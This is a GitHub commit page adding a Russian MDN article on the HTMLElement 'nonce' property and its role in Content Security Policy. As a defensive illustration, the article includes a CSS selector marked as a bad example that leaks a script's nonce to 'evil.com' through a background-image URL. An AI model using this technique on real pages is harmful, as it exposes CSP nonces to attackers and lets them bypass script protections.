-
Notifications
You must be signed in to change notification settings - Fork 8.1k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
[ru] add
Web/API/HTMLElement/nonce
document (#17319)
[ru] add 'Web/API/HTMLElement/nonce' document
- Loading branch information
Showing
1 changed file
with
46 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,46 @@ | ||
--- | ||
title: "HTMLElement: свойство nonce" | ||
slug: Web/API/HTMLElement/nonce | ||
l10n: | ||
sourceCommit: a3d9f61a8990ba7b53bda9748d1f26a9e9810b18 | ||
--- | ||
|
||
{{APIRef("HTML DOM")}} | ||
|
||
Свойство **`nonce`** интерфейса {{DOMxRef("HTMLElement")}} возвращает одноразовое криптографическое число используемое в [Content Security Policy](/ru/docs/Web/HTTP/CSP) для определения возможности продолжения обработки запроса. | ||
|
||
В современных реализациях элементы предоставляют свой атрибут `nonce` только скриптам (но не CSS-селекторам, например). | ||
|
||
## Примеры | ||
|
||
### Получение значения nonce | ||
|
||
В прошлом не все браузеры поддерживали IDL-атрибут `nonce`, поэтому было распространено использование [`getAttribute`](/ru/docs/Web/API/Element/getAttribute) в качестве запасного варианта: | ||
|
||
```js | ||
let nonce = script["nonce"] || script.getAttribute("nonce"); | ||
``` | ||
|
||
Современные браузеры не дают получить значения `nonce` таким путём (будет возвращена пустая строка). IDL-свойство (`script['nonce']`) является единственным способом получения `nonce`. | ||
|
||
Скрытие `nonce` помогает предотвратить их получение злоумышленниками с помощью механизмов, которые могут собирать данные из атрибутов содержимого, таких как этот селектор CSS: | ||
|
||
```css example-bad | ||
script[nonce~="whatever"] { | ||
background: url("https://evil.com/nonce?whatever"); | ||
} | ||
``` | ||
|
||
## Спецификации | ||
|
||
{{Specifications}} | ||
|
||
## Совместимость с браузерами | ||
|
||
{{Compat}} | ||
|
||
## Смотрите также | ||
|
||
- [Глобальный атрибут `nonce`](/ru/docs/Web/HTML/Global_attributes/nonce) | ||
- [Content Security Policy](/ru/docs/Web/HTTP/CSP) | ||
- CSP: {{CSP("script-src")}} |